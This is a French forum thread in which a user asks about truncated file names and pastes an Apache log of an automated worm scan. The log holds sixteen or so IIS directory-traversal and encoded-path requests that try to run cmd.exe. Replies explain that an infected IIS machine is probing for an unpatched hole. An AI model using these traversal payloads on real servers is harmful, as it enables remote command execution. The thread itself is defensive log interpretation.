je souhaite modifier ceci car j'ai un rep qui contient des noms de fichiers trop longs
ils sont donc tronqués    
il y a un moyen por etendre cette zone ???

ça veut dire quoi cette log ??
 
217-123-123-123 - - [08/Sep/2002:21:39:53 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 317
217-123-123-123 - - [08/Sep/2002:21:39:53 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 315
217-123-123-123 - - [08/Sep/2002:21:39:54 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217-123-123-123 - - [08/Sep/2002:21:39:54 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217-123-123-123 - - [08/Sep/2002:21:39:54 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
217-123-123-123 - - [08/Sep/2002:21:39:55 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 356
217-123-123-123 - - [08/Sep/2002:21:39:55 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 356
217-123-123-123 - - [08/Sep/2002:21:39:56 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 372
217-123-123-123 - - [08/Sep/2002:21:39:56 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
217-123-123-123 - - [08/Sep/2002:21:39:57 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
217-123-123-123 - - [08/Sep/2002:21:39:57 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
217-123-123-123 - - [08/Sep/2002:21:39:58 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338
217-123-123-123 - - [08/Sep/2002:21:39:58 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
217-123-123-123 - - [08/Sep/2002:21:39:58 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 322
217-123-123-123 - - [08/Sep/2002:21:39:59 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
217-123-123-123 - - [08/Sep/2002:21:40:00 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339

Pour tes noms de fichiers, je sais pas.
 
Mais pour le contenu de ton log, c'est un serveur (IIS normalement) avec une faille et infecté qui a scanné ton IP. C'est sans gravité.
 
a+

c'est la log d'apache de ce soir
y'a pas mal de trucs du genre ,script ,winnt, cmd.exe  

Tu n'as pas de soucis à te faire pour ca, à moins que tu aies un serveur IIS avec une faille (càd celui de NT4 s'il n'a pas été patché je pense).
 
En fait, c'est probablement un ordinateur infecté qui se connecte à d'autres machines à la recherche d'une faille (qui permet d'exécuter n'importe quelle commande sur l'ordinateur) à exploiter.
 
Voila
 
PS : ca doit pas être très légal de diffuser des MP3 comme ca...  

Merci pr la tite intro aux IIs mordic
 
a++
^^